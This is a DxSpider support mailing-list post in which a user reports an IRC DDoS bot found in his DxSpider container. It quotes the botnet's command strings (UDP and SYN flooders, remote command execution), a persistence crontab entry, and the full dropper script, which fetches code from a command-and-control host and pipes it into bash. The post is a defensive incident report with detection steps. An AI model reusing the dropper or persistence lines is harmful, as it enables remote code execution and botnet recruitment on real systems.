[Dxspider-support] URGENT Suspicious traffic in my container - Scanbot

Patrick Skerrett patrick at skerrett.net
Sat Sep 6 18:01:42 BST 2025 

Hi Dirk,


FYI, Sorry I did not send this to the spider list initially...




On Sat, Sep 6, 2025 at 10:42 AM Patrick Skerrett <patrick at skerrett.net>
wrote:

> I run DxSpider as a docker container on my swarm cluster. I had a ping
> this morning from my IDS router that there was some command & control
> traffic to IRC coming from the node that runs DxSpider.
>
> In looking, I found what looks like a DDOS bot deployed on my node, as the
> user 'sysop' (that the DXSpider user runs under).
>
> *************
> Considering the DXSpider server runs in an isolated container and the
> suspicious files were written as the 'sysop' owner, I think I have to
> conclude there is a vulnerability in the DxSpider software that allowed
> this payload to be deployed!!
> *********
>
> Here is the relevant info:
>
> Payload was written to "/var/tmp/.. / "  That is dot dot space
>
> Obfuscated directory name to make it hard to navigate to.
>
> The process itself is a compiled application called '-bash'
>
> Trying to view it in a hex editor, I discovered these strings:
>
> root at node3:/var/tmp/.. /bot# strings "/var/tmp/.. /bot/-bash" | grep -E
> "(http|tcp|connect|socket|bot|scan)" | head -10
> NOTICE %s :Unable to create socket.
> http://
> NOTICE %s :Unable to connect to http.
> NOTICE %s :GET <http address> <save as>                     = Downloads a
> file off the web and saves it onto the hd
> [32m botnet
> [36m E.G %s -h bot -n nick -i ident -r name -c #chan -k key -xu user -xp
> pass
> [37m bot nick is required e.g
> [37m bot ident is required e.g
> [37m bot realname is required e.g
> Not a socket
>
> root at node3:/var/tmp/.. /bot# strings "/var/tmp/.. /bot/-bash" | grep -E
> "(PING|PONG|JOIN|PRIVMSG|MODE)" | head -10
> MODE %s +xi
> JOIN %s :%s
> PONG %s
> JOIN %s
> MODE %s +o %s
> PRIVMSG
> PING
> JOIN
> DT_JOINABLE
> _PRIVMSG
>
> root at node3:/var/tmp/.. /bot# strings "/var/tmp/.. /bot/-bash" | grep -i
> "NOTICE"
> NOTICE %s :Unable to comply.
> NOTICE %s :GET <host> <save as>
> NOTICE %s :Unable to create socket.
> NOTICE %s :Unable to resolve address.
> NOTICE %s :Unable to connect to http.
> NOTICE %s :Receiving file.
> NOTICE %s :Saved as %s
> NOTICE %s :Spoofs: %d.%d.%d.%d
> NOTICE %s :Spoofs: %d.%d.%d.%d - %d.%d.%d.%d
> NOTICE %s :Bot by anonymous
> NOTICE %s :NICK <nick>
> NOTICE %s :Nick cannot be larger than 9 characters.
> NOTICE %s :DISABLE <pass>
> NOTICE %s :Current status is: %s.
> NOTICE %s :Already disabled.
> NOTICE %s :Password too long! > 254
> NOTICE %s :Disable sucessful.
> NOTICE %s :ENABLE <pass>
> NOTICE %s :Already enabled.
> NOTICE %s :Wrong password
> NOTICE %s :Password correct.
> NOTICE %s :Removed all spoofs
> NOTICE %s :What kind of subnet address is that? Do something like: 169.40
> NOTICE %s :Unable to resolve %s
> NOTICE %s :UDP <target> <port> <secs>
> NOTICE %s :Packeting %s.
> NOTICE %s :PAN <target> <port> <secs>
> NOTICE %s :Panning %s.
> NOTICE %s :TSUNAMI <target> <secs>
> NOTICE %s :Tsunami heading for %s.
> NOTICE %s :UNKNOWN <target> <secs>
> NOTICE %s :Unknowning %s.
> NOTICE %s :MOVE <server>
> NOTICE %s :TSUNAMI <target> <secs>                          = Special
> packeter that wont be blocked by most firewalls
> NOTICE %s :PAN <target> <port> <secs>                       = An advanced
> syn flooder that will kill most network drivers
> NOTICE %s :UDP <target> <port> <secs>                       = A udp flooder
> NOTICE %s :UNKNOWN <target> <secs>                          = Another
> non-spoof udp flooder
> NOTICE %s :NICK <nick>                                      = Changes the
> nick of the client
> NOTICE %s :SERVER <server>                                  = Changes
> servers
> NOTICE %s :GETSPOOFS                                        = Gets the
> current spoofing
> NOTICE %s :SPOOFS <subnet>                                  = Changes
> spoofing to a subnet
> NOTICE %s :DISABLE                                          = Disables all
> packeting from this client
> NOTICE %s :ENABLE                                           = Enables all
> packeting from this client
> NOTICE %s :KILL                                             = Kills the
> client
> NOTICE %s :GET <http address> <save as>                     = Downloads a
> file off the web and saves it onto the hd
> NOTICE %s :VERSION                                          = Requests
> version of client
> NOTICE %s :KILLALL                                          = Kills all
> current packeting
> NOTICE %s :HELP                                             = Displays this
> NOTICE %s :IRC <command>                                    = Sends this
> command to the server
> NOTICE %s :SH <command>                                     = Executes a
> command
> NOTICE %s :Killing pid %d.
> NOTICE %s :%s
>
>
>
>
> This is obviously bad stuff..
>
>
> **** HOW TO DETECT IF THIS IS ON YOUR NODE****
>
> As sudo:
>  ps -ef |grep ScanBot
> sysop       1990       1  0 09:40 ?        00:00:00 ScanBot
>
> # ls -l "/var/tmp/.. /"
> total 5340
> -rw-r----- 1 sysop sysop   72770 Sep  6 09:39 block.lst
> drwxr-xr-x 2 sysop sysop    4096 Apr  3 02:55 bot
> -rwxr-xr-x 1 sysop sysop     855 Feb 12  2023 clear
> -rwxr-xr-x 1 sysop sysop 3272064 Oct 12  2023 curl
> drwxr-xr-x 2 sysop sysop    4096 Sep  6 09:31 pass_files
> -rwxr-xr-x 1 sysop sysop 2094872 Jul 13  2024 rm
> -rwxr-xr-x 1 sysop sysop     499 Sep  6 09:29 scanbot
> -rw-r--r-- 1 sysop sysop       0 Sep  6 10:35 scanbot.lst
> drwxr-xr-x 2 sysop sysop    4096 Dec  7  2023 screen
>
> It created a crontab entry for the sysop user:
>  /var/spool/cron/crontabs/sysop
> root at node3:/var/tmp# cat /var/spool/cron/crontabs/sysop
> # DO NOT EDIT THIS FILE - edit the master and reinstall.
> # (- installed on Sat Sep  6 09:29:49 2025)
> # (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
> * * * * * "/var/tmp/.. "/scanbot
>
> runs every minute and tries to re-download itself:
>
> #!/bin/bash
>
> cd "/var/tmp/.. "
> shopt -s expand_aliases
> alias curl="./curl"
> type="randomscan"
> host="cc.systemctl.cc"
> api="scanbot.sh"
> brute_type="spirit"
> pubnick="sysop at 98.46.184.64"
> privnick="sysop at 98.46.143.4"
> scanbot()
> {
>     url="$1"
>     if [ ! -z "$url" ]; then
>         url="url = \"$url\""
>         curl -K - << EOF
>         ipv4
>         fail
>         silent
>         connect-timeout = 60
>         max-time = 120
>         retry = 2
>         $url
> EOF
>         sync
>     fi
> }
> scanbot
> $host/$api?type=$type\&brute_type=$brute_type\&pubnick=$pubnick\&privnick=$privnick
> | bash
>
>
>
>
>
>
>
> ************
> Please check to see if anyone is running this process, if so, we may have
> a vulnerability that would allow the DXSpider cluster to become a DDOS C&C
> vector!!!
> ********
>
>
>
>
>
>
>
>
>
>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://mailman.tobit.co.uk/pipermail/dxspider-support/attachments/20250906/2ab508fa/attachment.htm>

More information about the Dxspider-support mailing list